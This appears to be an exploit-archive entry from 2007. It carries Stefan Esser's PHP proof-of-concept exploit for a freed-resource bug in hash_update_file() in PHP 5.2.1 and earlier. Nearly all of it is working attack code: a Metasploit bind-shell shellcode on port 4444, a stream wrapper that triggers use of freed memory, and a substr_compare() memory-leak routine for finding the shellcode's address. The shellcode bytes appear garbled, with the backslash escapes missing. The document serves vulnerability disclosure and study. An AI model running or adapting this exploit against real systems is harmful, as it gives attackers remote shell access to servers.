[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit
# Published : 2007-03-20
# Author : Stefan Esser
# Previous Title : PHP 5.2.1 unserialize() Local Information Leak Exploit
# Next Title : PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ //
// | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|__,_||_| __,_|___||_||_|___|__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP hash_update_file() freed resource usage exploit //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
// linux x86 bindshell on port 4444 from Metasploit
$shellcode = "x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x46".
"x32x3cxe5x83xebxfcxe2xf4x77xe9x6fxa6x15x58x3ex8f".
"x20x6axa5x6cxa7xffxbcx73x05x60x5ax8dx57x6ex5axb6".
"xcfxd3x56x83x1ex62x6dxb3xcfxd3xf1x65xf6x54xedx06".
"x8bxb2x6exb7x10x71xb5x04xf6x54xf1x65xd5x58x3exbc".
"xf6x0dxf1x65x0fx4bxc5x55x4dx60x54xcax69x41x54x8d".
"x69x50x55x8bxcfxd1x6exb6xcfxd3xf1x65";
define("OFFSET", pack("L",findOffset()));
class AttackStream {
function stream_open($path, $mode, $options, &$opened_path)
{
return true;
}
function stream_read($count)
{
hash_final($GLOBALS['hid'], true);
$GLOBALS['aaaaaaaaaaaaaaaaaaaaaa'] = str_repeat(OFFSET, 3);
return "A";
}
function stream_eof()
{
return true;
}
function stream_seek($offset, $whence)
{
return false;
}
}
stream_wrapper_register("attack", "AttackStream") or die("Failed to register protocol");
$hid = hash_init('md5');
hash_update_file($hid, "attack://nothing");
// This function uses the substr_compare() vulnerability
// to get the offset.
function findOffset()
{
global $offset_1, $offset_2, $shellcode;
// We need to NOT clear these variables,
// otherwise the heap is too segmented
global $memdump, $d, $arr;
$sizeofHashtable = 39;
$maxlong = 0x7fffffff;
// Signature of a big endian Hashtable of size 256 with 1 element
$search = "x00x01x00x00xffx00x00x00x01x00x00x00";
$memdump = str_repeat("A", 8192);
for ($i=0; $i<400; $i++) {
$d[$i]=array();
}
unset($d[350]);
$x = str_repeat("x01", $sizeofHashtable);
unset($d[351]);
unset($d[352]);
$arr = array();
for ($i=0; $i<129; $i++) { $arr[$i] = 1; }
$arr[$shellcode] = 1;
for ($i=0; $i<129; $i++) { unset($arr[$i]); }
// If the libc memcmp leaks the information use it
// otherwise we only get a case insensitive memdump
$b = substr_compare(chr(65),chr(0),0,1,false) != 65;
for ($i=0; $i<8192; $i++) {
$y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
$Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
if ($y-$Y == 1 || $Y-$y==1){
$y = chr($y);
if ($b && strtoupper($y)!=$y) {
if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
$y = strtoupper($y);
}
}
$memdump[$i] = $y;
} else {
$y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
$Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);
if ($y-$Y != 1 && $Y-$y!=1){
$memdump[$i] = chr(1);
} else {
$memdump[$i] = chr(0);
}
}
}
// Search hashtable to get the shellcode offset
$pos_hashtable = strpos($memdump, $search);
if ($pos_hashtable == 0) {
die ("Unable to find the offset");
}
$addr = substr($memdump, $pos_hashtable+6*4, 4);
$addr = unpack("L", $addr);
return ($addr[1] + 32);
}
?>
# www.Syue.com [2007-03-20]